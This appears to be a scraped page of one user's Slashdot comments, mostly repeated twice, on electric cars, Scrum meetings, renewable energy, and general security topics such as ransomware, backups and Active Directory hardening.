It could be worse. It wasn't that long ago when most electric cars looked like the i-MyEV, or little pods that looked cool at a "let's all go green" conference, but were just too ugly to take seriously. Tesla and others at least has made electric vehicles look decent, and though definitely not as stylish at front-line vehicles, good enough for a daily driver. Tesla also made electric vehicles into decent performance vehicles.
I don't get how Scrum even works. The last couple places I worked had daily standup meetings which were at least 1-2 hours, and in one company's case, 4-6 hours. Every. Single. Workday. Plus, the meetings didn't do anything other than just get the same lazy trolls to keep stirring the pot. The PM would go around and ask what people did, and the same people would be wailing and saying that they were blocked by so-and-so, so they cannot do any work today. The person who was supposedly blocking then had to defend themselves or else be called out for wasting people's time. Even if it was an IT person who was waiting for a dev to actually put code into a test environment before it would go into production, the IT person would have to defend why they don't just allow the devs free reign to put their code in the production environment when the dev feels like it to save time. The longer Scrum meetings would leave everyone burned out, and in the few hours remaining of the day, usually it consisted of a late, late lunch, maybe a few tickets updated, and that was it for the day.
There used to be an app on Android called TextSecure, and another app called RedPhone. It was nice because both offered end to end encryption for messages and calls. The app even stored incoming/outgoing texts with encryption, so if the phone was unlocked, the messages were still protected.
The fact they bothered admitting a breach happened is a lot better than most companies. I personally would go elsewhere, because Duo and LastPass have stood the test of time, but with the fact that "security has no ROI" is a core motto in a lot of places, just admitting it is better than nothing.
I agree with this. The invisible hand, which is popular with the current mindset in the Executive/Judicial/Legislative branches, is definitely giving a middle finger to fossil fuels and nuclear:
1: Solar, the cat is out of the bag. It is becoming more economical to have, rather than not. Especially with Tesla's roof and TeslaWall offerings. 2: Even with the EPA hamstrung, people don't like lignite coal plants, and will protest them. 3: The era of the SUV is behind us here in the US. Yes, you see the occasional Tahoe, but people are going for Lexus RX models or other CUVs. People know that a gas crunch can come at any time. Priuses are still selling like hotcakes. Even in the rural, banjo country areas, because there is so much distance to travel, higher fuel economy cars are desired. 4: Electric cars are advancing. Even the hayseeds would love a 1 ton pickup that has max torque at 0 RPMs, and the ability to have an inverter for 5-10k watts for a welder or other power tools for the secluded parts of a farm/ranch, and be recharged from a plug. Upkeep needs for an electric vehicle are minimal. No real oil changes needed, for example. 5: Nuclear is all but dead. It would have been viable, but with contractors and sub-contractors who can't even ground a showerhead, the attitude of "lets cut corners, get our golden parachutes, and let others deal with it" killed the technology cold.
Yep, part of what the company was selling was security. They knew they were going to be a big fat target, with a lot of eggs in their basket. I can't fault them, because at least they admitted the breach. However, they should consider better encryption mechanisms. LastPass has been attacked a few times, but they have weathered the storm.
It might be that they need to re-architect their setup, with defense in depth.
The move to renewables is going to happen no matter what the politicos do. Most Americans know that it wouldn't take much for gas prices to go through the roof, especially if Iran decides to mine the Strait of Hormuz again. Even the board members with Exxon-Mobil want something better, just because even with fracking and oil expansion, they know the handwriting is on the wall there, especially with Russia and China's ever expanding claims of territory.
As for coal, we have long since passed peak coal. Most coal plants use lignite coal, which is the worst (in purity and energy output) type of coal there is, just because the good stuff has already been burned up. With environmental costs going up (even regardless of the current administration), coal is definitely on its way out in the US.
Plus, ignoring the base/peak factor, solar is very cheap to install and maintain. Upkeep for fixed-axis panels very minimal. Even though solar requires a lot more area than other energy sources, the fact that it is "set up and forget" gives it a great advantage over time.
Yes, the US may leave the Paris Accord... but in reality, nothing will change. Cities are already leading the way, and the invisible hand is definitely giving the middle finger to fossil fuels in general.
I can see that. With traffic now, there isn't a need for 2 second 0-60 times. What is needed is fuel economy, being able to handle being stopped and using as little fuel as possible, and being comfortable to handle the two hour commute caused by a jack-knifed semi or some drunk who flipped their vehicle.
Horsepower has improved since the 1990s. The days of a Geo Metro or Mazda GLC holding up an entire line of traffic on a highway merge are long gone. Almost any car these days can merge safely onto US roads, and if it doesn't... that is the driver's error. We really don't need more HP, but a focus on creature comforts, reliability, and fuel economy. Cheap gas isn't going to last (it can be gone in hours, especially if Iran decides its time to mine the Strait of Hormuz again, or Daesh knocks out a refinery.) Hybrid cars bring the ability to use grid power (here in the US, that can come from biomass, solar, coal, nuclear, wind, or the hot air over DC.), reducing the need for fossil fuels specifically.
With commute times getting longer, and cities uninterested in expanding roads, it might be wise to consider autonomous cars like pop-top campervans. Hop in the vehicle, then take a shower and eat while it takes you to work, similar with the commute home. For longer trips, it would be useful because with automatic refueling, one could let the vehicle drive 24/7, and if you don't feel like stopping for something, you can just do a trip fairly quickly, no having to stop at a hotel for the night.
The thing about ransomware, it doesn't need to fight with SELinux, nor escalate to root, to cause damage. It just needs enough access to read/write the user's files, which most web browsers provide. Even having an Internet connection isn't needed, since ransomware can bundle a public key with it that it can encrypt an individualized ephemeral private key, then use the public key from that ephemeral keypair to encrypt all files.
Ransomware is part of a perfect storm. So many companies don't bother with security. Individuals don't care or don't bother. With the lack of consumer-tier tape drives and optical drives of a decent capacity, backup drives and cloud-synced storage are easy pickings for deletion. Not many end users really care to use a program like Mozy, Carbonite, or CrashPlan.
Windows also has the pressure of organizations, even governments, trying to find security holes in it. Extremely well-heeled groups who have lots of cash to spend on reverse-engineering every single part of the OS. Any OS under this much scrutiny will have holes found in it, just because the gains in finding a remote exploit are just so extreme. Someone finding a way to have something run as SYSTEM that a web browser picks up, can become a billionare in a heartbeat.
I really wish phones offered container or VM functionality. That way, I can keep sets of contacts separate, and keep work stuff separate from home stuff. Not hard to do, because the ARM CPU offers "worlds" which are essentially containers... but tend to not be used.
There used to be an app called RootCloak that worked on the XPosed framework, which when given an application list, would prevent a program from seeing if SuperSU was present or a su binary was installed in the usual directories. However, both the XPosed framework and RootCloak have not been updated for any new release of Android. I used to use this to allow SoftCard to run ages ago.
I would argue that biometrics are a class in themselves. Essentially a checkbox. For authentication, you have your userID (the object that is asking for authentication.) You have the password (something you know.) You have a 2FA code (something you possess), and a fingerprint (something you are.) Sometimes, with geo-location, one can add somewhere you are.
Does it increase security? It is a security factor. Is it worth it over something like Duo or a PIN on the HID card reader? Depends on what is being secured. Something high value like Lower Elbonia's secret sauce would probably need to have the additional factor in security. However, even a midsize corporation likely wouldn't be needing biometrics for physical access since they likely wouldn't be targeted.
Even with this in mind, if someone is wanting in that bad in a place that biometrics are used, there should be duress codes or other mechanisms in play, otherwise someone with the cheap 9mm from a drug dealer will be able to "bypass" all physical authentication pretty easily.
I am waiting for the generation of ransomware which installs a shim driver that transparantly encrypts documents, but allows the user to access them for a certain period time (so all backups in 30-90 days are useless), then at a date/time, purges the keys, and springs the trap.
I would say that these days, I'd consider a much longer backup rotation with snapshots kept for years just in case.
I also would look at a "pull" backup mechanism, a client that the server contacts. That way, unlike backing up to a share, the backup share could be destroyed.
Even smaller shops tend to have the VoIP stuff on a separate VLAN, just for QoS purposes, to ensure that a doctor calling in a prescription for Prozium or Joy will not get dropped.
It would be interesting to see how this attack happened. A misconfigured AD forest could have allowed for brute-forcing a DA/EA account. Especially if there is no protection against brute force [1]. A lack of physical security could have allowed someone to boot a DC and crack an admin account.
In any case, why wasn't AppLocker running? This would have stopped this attack cold.
[1]: Ideally, accounts connected to users should have some timeout, even if it is 1-3 minutes. Service accounts should have an obnoxiously long (30+ characters) password. For local admin accounts, LAPS is a must.
Oh, there is always the, "Solar panels and wind turbines require more energy to be made than they gain back in their lifetime", argument. I see that popping up often as well.
VirtualBox is also great for working with Vagrant tasks, so that developers not just have the code to build/test, but the actual environment the code runs in. This way, the guy with the ton of oddball applications including an instance of Bonzi Boddy running in a W98 VM gets the same results as everyone else.
The problem with hacking is that a lot of companies have the "security has no ROI" attitude. Last year, when I interviewed at one place (and definitely didn't take the offer), the CxO gave me the song and dance about "only person that profits from a lock is the lock maker", and when I asked what they would do in case of a breach, the response was, "we will call Accenture and let their world class professionals fix it."
With an attitude like that, it is surprising breaches don't happen more often in the private sector. The problem is that until there is an actual reason, and something that makes top brass actually value security, it won't happen. The -only- thing that has worked is PCI-DSS, because ignoring that hits businesses squarely in the pocketbook.
Apple? I like macOS for bread and butter computing, but I won't be destroyed if I wind up using a Dell or Lenovo. Microsoft? There isn't much out that will scale as well as AD, so perhaps someone (Novell?) would put out a good LDAP offering that can handle things. Other than that, a good Puppet infrastructure could replace SCCM. Amazon? Azure and OpenStack items could replace AWS, and someone could make an API interface to map all AWS calls to the other cloud providers. Facebook? Easiest to replace. If they disappeared, G+, VK, WeChat, could step in. Eventually MS or another big company would fill that gap with a very usable offering. Google? I'd say the hardest to replace, but the search engine could be replaced with Bing, the cloud services with AWS or Azure, Gmail with office.com, the Play Store with Amazon's Android store, and perhaps MS could make a variant or fork of AOSP.
The real company that would be a pain to replace would be ARM, even though they don't make any chips themselves.
What should be done is to create autonomous-only intersections to start off with. The first mention of self-driving cars, having intersections where vehicles could speed up or slow down to allow crossing at full speed would be a way to allow for fast travel without having to do expensive flyovers... just a four way intersection, perhaps with some mechanism to handle leftbound (rightbound in the UK) traffic. Then go from there and expand it to other places.
The ideal is to have a phone that doesn't need a case to survive a drop or two. I had an iPhone 4, and it stayed intact because from day 1, it lived in an Otterbox case.
With the engineering needs, such as heat dissipation, having larger, thinner phones is just natural phone evolution. Because people want faster CPUs that require a larger heat sink, pretending that larger and more delicate phones are what customers what only makes sense. So, it isn't a surprise phones are getting more delicate.
I would say that for most smartphones, a case is a must. It doesn't have to be a big, clunky Otterbox Tank, but at least something that can absorb shock, guard against scratches from pocket oddments (sand, keys, caltrops), and also perhaps protect the ports from lint as well. If one sells their phones, it does help with resale value.
Slashdot Mirror
It could be worse. It wasn't that long ago when most electric cars looked like the i-MyEV, or little pods that looked cool at a "let's all go green" conference, but were just too ugly to take seriously. Tesla and others at least has made electric vehicles look decent, and though definitely not as stylish at front-line vehicles, good enough for a daily driver. Tesla also made electric vehicles into decent performance vehicles.
Yep, already forced to do that with Thunderbird.
I wish they would at least offer and support them here in the US. Not everyone needs a flagship Android phone.
Oh, and they should have some method for a bootloader unlock.
I don't get how Scrum even works. The last couple places I worked had daily standup meetings which were at least 1-2 hours, and in one company's case, 4-6 hours. Every. Single. Workday. Plus, the meetings didn't do anything other than just get the same lazy trolls to keep stirring the pot. The PM would go around and ask what people did, and the same people would be wailing and saying that they were blocked by so-and-so, so they cannot do any work today. The person who was supposedly blocking then had to defend themselves or else be called out for wasting people's time. Even if it was an IT person who was waiting for a dev to actually put code into a test environment before it would go into production, the IT person would have to defend why they don't just allow the devs free reign to put their code in the production environment when the dev feels like it to save time. The longer Scrum meetings would leave everyone burned out, and in the few hours remaining of the day, usually it consisted of a late, late lunch, maybe a few tickets updated, and that was it for the day.
There used to be an app on Android called TextSecure, and another app called RedPhone. It was nice because both offered end to end encryption for messages and calls. The app even stored incoming/outgoing texts with encryption, so if the phone was unlocked, the messages were still protected.
Skype or Skype for Business?
Skype for Business seems to be doing quite well as messaging/voice for the enterprise, especially if an organization is heavily invested in O365.
The fact they bothered admitting a breach happened is a lot better than most companies. I personally would go elsewhere, because Duo and LastPass have stood the test of time, but with the fact that "security has no ROI" is a core motto in a lot of places, just admitting it is better than nothing.
I agree with this. The invisible hand, which is popular with the current mindset in the Executive/Judicial/Legislative branches, is definitely giving a middle finger to fossil fuels and nuclear:
1: Solar, the cat is out of the bag. It is becoming more economical to have, rather than not. Especially with Tesla's roof and TeslaWall offerings.
2: Even with the EPA hamstrung, people don't like lignite coal plants, and will protest them.
3: The era of the SUV is behind us here in the US. Yes, you see the occasional Tahoe, but people are going for Lexus RX models or other CUVs. People know that a gas crunch can come at any time. Priuses are still selling like hotcakes. Even in the rural, banjo country areas, because there is so much distance to travel, higher fuel economy cars are desired.
4: Electric cars are advancing. Even the hayseeds would love a 1 ton pickup that has max torque at 0 RPMs, and the ability to have an inverter for 5-10k watts for a welder or other power tools for the secluded parts of a farm/ranch, and be recharged from a plug. Upkeep needs for an electric vehicle are minimal. No real oil changes needed, for example.
5: Nuclear is all but dead. It would have been viable, but with contractors and sub-contractors who can't even ground a showerhead, the attitude of "lets cut corners, get our golden parachutes, and let others deal with it" killed the technology cold.
Yep, part of what the company was selling was security. They knew they were going to be a big fat target, with a lot of eggs in their basket. I can't fault them, because at least they admitted the breach. However, they should consider better encryption mechanisms. LastPass has been attacked a few times, but they have weathered the storm.
It might be that they need to re-architect their setup, with defense in depth.
The move to renewables is going to happen no matter what the politicos do. Most Americans know that it wouldn't take much for gas prices to go through the roof, especially if Iran decides to mine the Strait of Hormuz again. Even the board members with Exxon-Mobil want something better, just because even with fracking and oil expansion, they know the handwriting is on the wall there, especially with Russia and China's ever expanding claims of territory.
As for coal, we have long since passed peak coal. Most coal plants use lignite coal, which is the worst (in purity and energy output) type of coal there is, just because the good stuff has already been burned up. With environmental costs going up (even regardless of the current administration), coal is definitely on its way out in the US.
Plus, ignoring the base/peak factor, solar is very cheap to install and maintain. Upkeep for fixed-axis panels very minimal. Even though solar requires a lot more area than other energy sources, the fact that it is "set up and forget" gives it a great advantage over time.
Yes, the US may leave the Paris Accord... but in reality, nothing will change. Cities are already leading the way, and the invisible hand is definitely giving the middle finger to fossil fuels in general.
I can see that. With traffic now, there isn't a need for 2 second 0-60 times. What is needed is fuel economy, being able to handle being stopped and using as little fuel as possible, and being comfortable to handle the two hour commute caused by a jack-knifed semi or some drunk who flipped their vehicle.
Horsepower has improved since the 1990s. The days of a Geo Metro or Mazda GLC holding up an entire line of traffic on a highway merge are long gone. Almost any car these days can merge safely onto US roads, and if it doesn't... that is the driver's error. We really don't need more HP, but a focus on creature comforts, reliability, and fuel economy. Cheap gas isn't going to last (it can be gone in hours, especially if Iran decides its time to mine the Strait of Hormuz again, or Daesh knocks out a refinery.) Hybrid cars bring the ability to use grid power (here in the US, that can come from biomass, solar, coal, nuclear, wind, or the hot air over DC.), reducing the need for fossil fuels specifically.
With commute times getting longer, and cities uninterested in expanding roads, it might be wise to consider autonomous cars like pop-top campervans. Hop in the vehicle, then take a shower and eat while it takes you to work, similar with the commute home. For longer trips, it would be useful because with automatic refueling, one could let the vehicle drive 24/7, and if you don't feel like stopping for something, you can just do a trip fairly quickly, no having to stop at a hotel for the night.
That wouldn't be too bad. I'd wind up just buying more Ford shares as a stock to keep and hold.
The thing about ransomware, it doesn't need to fight with SELinux, nor escalate to root, to cause damage. It just needs enough access to read/write the user's files, which most web browsers provide. Even having an Internet connection isn't needed, since ransomware can bundle a public key with it that it can encrypt an individualized ephemeral private key, then use the public key from that ephemeral keypair to encrypt all files.
Ransomware is part of a perfect storm. So many companies don't bother with security. Individuals don't care or don't bother. With the lack of consumer-tier tape drives and optical drives of a decent capacity, backup drives and cloud-synced storage are easy pickings for deletion. Not many end users really care to use a program like Mozy, Carbonite, or CrashPlan.
Windows also has the pressure of organizations, even governments, trying to find security holes in it. Extremely well-heeled groups who have lots of cash to spend on reverse-engineering every single part of the OS. Any OS under this much scrutiny will have holes found in it, just because the gains in finding a remote exploit are just so extreme. Someone finding a way to have something run as SYSTEM that a web browser picks up, can become a billionare in a heartbeat.
I really wish phones offered container or VM functionality. That way, I can keep sets of contacts separate, and keep work stuff separate from home stuff. Not hard to do, because the ARM CPU offers "worlds" which are essentially containers... but tend to not be used.
There used to be an app called RootCloak that worked on the XPosed framework, which when given an application list, would prevent a program from seeing if SuperSU was present or a su binary was installed in the usual directories. However, both the XPosed framework and RootCloak have not been updated for any new release of Android. I used to use this to allow SoftCard to run ages ago.
I would argue that biometrics are a class in themselves. Essentially a checkbox. For authentication, you have your userID (the object that is asking for authentication.) You have the password (something you know.) You have a 2FA code (something you possess), and a fingerprint (something you are.) Sometimes, with geo-location, one can add somewhere you are.
Does it increase security? It is a security factor. Is it worth it over something like Duo or a PIN on the HID card reader? Depends on what is being secured. Something high value like Lower Elbonia's secret sauce would probably need to have the additional factor in security. However, even a midsize corporation likely wouldn't be needing biometrics for physical access since they likely wouldn't be targeted.
Even with this in mind, if someone is wanting in that bad in a place that biometrics are used, there should be duress codes or other mechanisms in play, otherwise someone with the cheap 9mm from a drug dealer will be able to "bypass" all physical authentication pretty easily.
I am waiting for the generation of ransomware which installs a shim driver that transparantly encrypts documents, but allows the user to access them for a certain period time (so all backups in 30-90 days are useless), then at a date/time, purges the keys, and springs the trap.
I would say that these days, I'd consider a much longer backup rotation with snapshots kept for years just in case.
I also would look at a "pull" backup mechanism, a client that the server contacts. That way, unlike backing up to a share, the backup share could be destroyed.
Even smaller shops tend to have the VoIP stuff on a separate VLAN, just for QoS purposes, to ensure that a doctor calling in a prescription for Prozium or Joy will not get dropped.
It would be interesting to see how this attack happened. A misconfigured AD forest could have allowed for brute-forcing a DA/EA account. Especially if there is no protection against brute force [1]. A lack of physical security could have allowed someone to boot a DC and crack an admin account.
In any case, why wasn't AppLocker running? This would have stopped this attack cold.
[1]: Ideally, accounts connected to users should have some timeout, even if it is 1-3 minutes. Service accounts should have an obnoxiously long (30+ characters) password. For local admin accounts, LAPS is a must.
Oh, there is always the, "Solar panels and wind turbines require more energy to be made than they gain back in their lifetime", argument. I see that popping up often as well.
VirtualBox is also great for working with Vagrant tasks, so that developers not just have the code to build/test, but the actual environment the code runs in. This way, the guy with the ton of oddball applications including an instance of Bonzi Boddy running in a W98 VM gets the same results as everyone else.
The problem with hacking is that a lot of companies have the "security has no ROI" attitude. Last year, when I interviewed at one place (and definitely didn't take the offer), the CxO gave me the song and dance about "only person that profits from a lock is the lock maker", and when I asked what they would do in case of a breach, the response was, "we will call Accenture and let their world class professionals fix it."
With an attitude like that, it is surprising breaches don't happen more often in the private sector. The problem is that until there is an actual reason, and something that makes top brass actually value security, it won't happen. The -only- thing that has worked is PCI-DSS, because ignoring that hits businesses squarely in the pocketbook.
Apple? I like macOS for bread and butter computing, but I won't be destroyed if I wind up using a Dell or Lenovo.
Microsoft? There isn't much out that will scale as well as AD, so perhaps someone (Novell?) would put out a good LDAP offering that can handle things. Other than that, a good Puppet infrastructure could replace SCCM.
Amazon? Azure and OpenStack items could replace AWS, and someone could make an API interface to map all AWS calls to the other cloud providers.
Facebook? Easiest to replace. If they disappeared, G+, VK, WeChat, could step in. Eventually MS or another big company would fill that gap with a very usable offering.
Google? I'd say the hardest to replace, but the search engine could be replaced with Bing, the cloud services with AWS or Azure, Gmail with office.com, the Play Store with Amazon's Android store, and perhaps MS could make a variant or fork of AOSP.
The real company that would be a pain to replace would be ARM, even though they don't make any chips themselves.
What should be done is to create autonomous-only intersections to start off with. The first mention of self-driving cars, having intersections where vehicles could speed up or slow down to allow crossing at full speed would be a way to allow for fast travel without having to do expensive flyovers... just a four way intersection, perhaps with some mechanism to handle leftbound (rightbound in the UK) traffic. Then go from there and expand it to other places.
The ideal is to have a phone that doesn't need a case to survive a drop or two. I had an iPhone 4, and it stayed intact because from day 1, it lived in an Otterbox case.
With the engineering needs, such as heat dissipation, having larger, thinner phones is just natural phone evolution. Because people want faster CPUs that require a larger heat sink, pretending that larger and more delicate phones are what customers what only makes sense. So, it isn't a surprise phones are getting more delicate.
I would say that for most smartphones, a case is a must. It doesn't have to be a big, clunky Otterbox Tank, but at least something that can absorb shock, guard against scratches from pocket oddments (sand, keys, caltrops), and also perhaps protect the ports from lint as well. If one sells their phones, it does help with resale value.